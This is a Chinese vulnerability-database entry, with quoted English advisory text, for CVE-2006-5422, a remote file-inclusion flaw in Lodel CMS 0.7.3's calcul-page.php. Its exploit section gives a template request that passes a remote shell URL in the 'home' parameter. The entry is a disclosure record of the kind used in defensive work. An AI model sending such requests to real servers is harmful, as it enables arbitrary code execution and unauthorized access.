Lodel CMS 'Calcul-Page.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111311 漏洞类型 输入验证
发布时间 2006-10-17 更新时间 2006-10-23
CVE编号 CVE-2006-5422 CNNVD-ID CNNVD-200610-344
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28819
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-344
|漏洞详情
Lodel(patchlodel)0.7.3的calcul-page.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助home参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20551/info

Lodel CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

Version 0.7.3 is vulnerable to this issue; other versions may also be affected.

http://www.example.com/[path]/calcul-page.php?home=[shell]
|参考资料

来源:XF
名称:patchlodel-calcul-file-include(29606)
链接:http://xforce.iss.net/xforce/xfdb/29606
来源:BID
名称:20551
链接:http://www.securityfocus.com/bid/20551
来源:VUPEN
名称:ADV-2006-4082
链接:http://www.frsirt.com/english/advisories/2006/4082
来源:SECUNIA
名称:22429
链接:http://secunia.com/advisories/22429
来源:BUGTRAQ
名称:20061014patchlodel-0.7.3-RemoteFileIncludeVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116104206220783&w=2